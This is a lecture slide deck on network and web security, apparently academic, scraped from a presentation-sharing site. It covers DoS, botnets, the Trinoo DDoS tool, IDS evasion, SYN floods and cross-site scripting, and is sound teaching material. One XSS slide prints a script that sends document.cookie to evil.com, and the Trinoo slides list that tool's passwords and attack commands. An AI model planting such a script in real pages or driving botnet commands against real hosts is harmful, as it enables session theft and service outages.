Network websecurity
This presentation is the property of its rightful owner.
Sponsored Links
1 / 20

Network & WebSecurity PowerPoint PPT Presentation


  • 70 Views
  • Uploaded on
  • Presentation posted in: General

Network & WebSecurity. Dina Katabi [email protected] nms.csail.mit.edu/~dina. Denial of Service Attack (DoS). Goal: prevents legit access to an Internet service Mechanism: Typically tries to congest the service or bring it down

Download Presentation

Network & WebSecurity

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Network websecurity

Network & WebSecurity

Dina Katabi

[email protected]

nms.csail.mit.edu/~dina


Denial of service attack dos

Denial of Service Attack (DoS)

  • Goal: prevents legit access to an Internet service

  • Mechanism: Typically tries to congest the service or bring it down

  • Types: can target any resource, e.g., link bandwidth, routing system, access to database

  • Example: attacker transmits too many packets to congest the access link of the server causing legitimate connections to suffer excessive drops and timeout


Botnets

BotNets

  • A Botnet is a large collection of compromised machines controlled by an attacker

  • Botnets can be used to mount distributed DoS or DDoS

  • Machines in a botnet are compromised via Internet worms, viruses, Trojans, etc.

  • One can rent a Botnet of $10K machines for about $200/day


A botnet is typically organized in hierarchy

Unidirectional commands

Coordinating communication

Attack traffic

A Botnet is typically organized in hierarchy

Attacker

Master

Master

Master

Daemon

Daemon

Daemon

Daemon

Daemon

Daemon

Daemon

Daemon

Daemon

Daemon

Victim


Network security denial of service attacks

Specialized software is installed on the compromised machines, e.g., Trinoo

Connection to port (default 27665/tcp)

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'.

Kwijibo

Connection closed by foreign host. . . .

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'.

Betaalmostdone

trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>


Network security denial of service attacks

Trin00 Commands

  • dos <IP> - command to initiate a DoS against the targeted <IP> address

  • mdos <IP1:IP2:IP3> - sends command to attack three IP addresses, sequentially

  • die – shut down the master

  • mdie <password> - if correct password specified, packet is sent out to all daemon nodes to shutdown

  • mping – ping sent to all nodes in the deamon list

  • killdead – delete deamon nodes from list that didn’t reply to ping

  • bcast – gives a list of all active daemons

  • mstop – Attempts to stop an active DoS attack. Never implemented by the author(s), but the command is there


Approaches to intrusion detection

Approaches to Intrusion Detection

  • Signature Based: Keeps a DB of known attack signatures and matches traffic against DB (e.g., Bro, Snort)

    • Pros

      • Easy to understand the outcome

      • More accurate in detecting known attacks

    • Cons

      • Can’t discover new attacks

  • Anomaly Based: Matches traffic against a model of normal traffic and flags abnormalities (e.g., EMERALD)

    • Pros

      • Can deal with new attacks

    • Cons

      • Modeling normal. it is hard to describe what is normal

      • Limits new applications

      • Less accurate detection of known attacks

  • Hybrid: Matches against DB of known attacks. If no match, it checks for anomaly


Network security denial of service attacks

Evasion Problem in NIDS

  • Consider scanning traffic for a particular string (“USER root”)

  • Easiest: scan for the text in each packet

    • No good: text might be split across multiple packets

  • Okay, remember text from previous packet

    • No good: out-of-order delivery

  • Okay, fully reassemble byte stream

    • Costs state ….

    • …. and still evadable

Source: Vern Paxson


Network security denial of service attacks

Receiver

Sender

15 hops

20 hops

Evading Detection ViaAmbiguous TCP Retransmission

NIDS


Network security denial of service attacks

Receiver

Attacker

Evading Detection ViaAmbiguous TCP Retransmission

TTL=17, seq=1

Timed out

n

TTL=23, seq=1

r

r

NIDS

n or r?


Network security denial of service attacks

Receiver

Attacker

Evading Detection ViaAmbiguous TCP Retransmission

TTL=17, seq=1

Timed out

n

TTL=23, seq=1

r

r

TTL=21, seq=2

o

o

TTL=15, seq=2

Timed out

i

NIDS

n or r?

i or o?


Network security denial of service attacks

Receiver

Attacker

Evading Detection ViaAmbiguous TCP Retransmission

TTL=17, seq=1

Timed out

n

TTL=23, seq=1

r

r

TTL=21, seq=2

o

o

TTL=15, seq=2

Timed out

i

TTL=20, seq=3

o

o

TTL=19, seq=4

Timed out

c

TTL=27, seq=4

t

t

NIDS

n or r?

i or o?

o

c or t?

noot? niot? rooc? nooc?

nioc? riot? root? …


Tcp syn flood

TCP SYN Flood

TCP DoS Attacks:

Client

Server

SYNC

Listening

Store data

SYNS, ACKC

Wait

ACKS

Connected


Tcp syn flood1

TCP SYN Flood

TCP DoS Attacks:

C

S

SYNC1

Listening

SYNC2

Store data

SYNC3

SYNC4

SYNC5


Tcp syn flood2

TCP SYN Flood

TCP DoS Attacks:

  • Usually targets connection memory  Too many half-open connections

  • Potential victim is any TCP-based server such as a Web server, FTP server, or mail server

  • How can the server deal with it?

    • Server times out half-open connection


Dos attacks on web servers

DoS Attacks on Web Servers


Attacks that mimic legitimate traffic

DoS Attacks on Servers:

Attacks that Mimic Legitimate Traffic

GET LargeFile.zip

  • Attacker compromises many machines causing them to flood victim with HTTP requests

  • Attacked resources

    • DB and Disk bandwidth

    • Socket buffers, processes, …

    • Dynamic content, password checking, etc.

  • Hard to detect; attack traffic is indistinguishable from legitimate traffic

DO LongDBQuery


Network security denial of service attacks

Suspected attack! To access www.foo.com enter the above letters:

CAPTCH-Based Solution

  • Need to ensure:

    • Cheap ways to send test and check answer

    • Some people can’t or don’t want to answer graphical tests but are legitimate users (e.g., Blind users)


Web attacks

Web Attacks

  • Most web attacks exploit java scripts

  • Java scripts can appear in a web page as

    • <script> executable instructions </script>

    • The instructions between <script> instructions </script> do not appear on the web page; they get executed by the browser

    • If the instructions are malicious they can do a lot of harm to the client, e.g., steal web cookies

  • Cross-site scripting are one of the most common attack on web browsers


Cross site scripting xss

Cross-Site Scripting (XSS)

  • Say you have a trusted web server that accepts entries from users,

    • e.g.,TrustedBlog.com has a box for users to enter comments on prior blogs

  • Attacker can embed an executable script in his comment like:

    • <script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>

    • When a user browse the trusted server, the server sends the comments and the victim’s browser executes the script sending the victim’s cookie to the attacker’s site


  • Login